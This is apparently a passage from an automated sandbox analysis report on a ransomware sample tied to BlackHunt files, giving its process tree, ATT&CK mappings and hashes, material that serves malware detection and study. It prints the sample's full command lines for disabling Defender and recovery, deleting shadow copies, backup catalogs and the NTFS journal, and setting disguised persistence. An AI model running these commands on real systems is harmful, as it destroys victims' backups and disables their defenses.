5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 158 PID 4928 wrote to memory of 2516 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 158 PID 4928 wrote to memory of 4540 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 157 PID 4928 wrote to memory of 4540 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 157 PID 4928 wrote to memory of 1772 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 144 PID 4928 wrote to memory of 1772 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 144 PID 4928 wrote to memory of 2588 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 145 PID 4928 wrote to memory of 2588 4928 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe 145 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe"C:\Users\Admin\AppData\Local\Temp\5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:3436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:4560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3228
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵
- Adds Run key to start application
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3308
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe" /F2⤵PID:968
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5d921904e333a3678f8f5f85da1a4f2f6c9fee5c8bc12fc24b76c6b6cc4518cd.exe" /F3⤵
- Creates scheduled task(s)
PID:3864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4552
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4844
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5004
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:4856
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4548
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:924
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2968
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3148
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:116
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
- Modifies registry class
PID:2816 -
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3424
-
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:812
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:968
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1836
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4724
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD559ee7a4d9ada22908900166b2d96c417
SHA1e6c42c4884db52845fcba4b76232adc25257c901
SHA256171621b3ed4c7b466fdb81dd61153b0007d8c7be3496b7930801684c468a64d5
SHA5123d36b6543b5b7f5ab6dcff2e2fc28c6b0734b84ca4790ee3d9980c346be8ad3c854d2413a8c30c59ef76bc009fb8c0bdd285e762d53b51f942c17aa06a6496fc
-
Filesize
684B
MD5cf99ef420974d4f3f64f3aa7dcce9f1b
SHA147b79950e2a1f39ec022e7f6040238f2110e058d
SHA2562f47d9341f1b4de35c7be002db87a50d34cbfaf8a638e4dbfe5eb196eff279a6
SHA512b33cf3c2e503af40117549382d6787cd6fedcba5ded19216f7020c68402ad9dba393f9e8f2fdb4f430275c3deee5d1c043435e5f7741059757f2b0887479c668
-
Filesize
12KB
MD544db7b9321d167e616256d3f0814be9a
SHA168080b6873dfbbae2c1c25f8f45e75a492e8274b
SHA2560e512e6770e844b0fb4f49834375c3eeb7eeeeb3a8e28fe1ed29117385f6d291
SHA512f53fa3dfca647423e1fdbb95476a4768718a88859d4f2010bf3224227595eaba58eb840eaf7766a7df19664997ca21cb7c26c5b7467ca2baeb2cde290c6715b6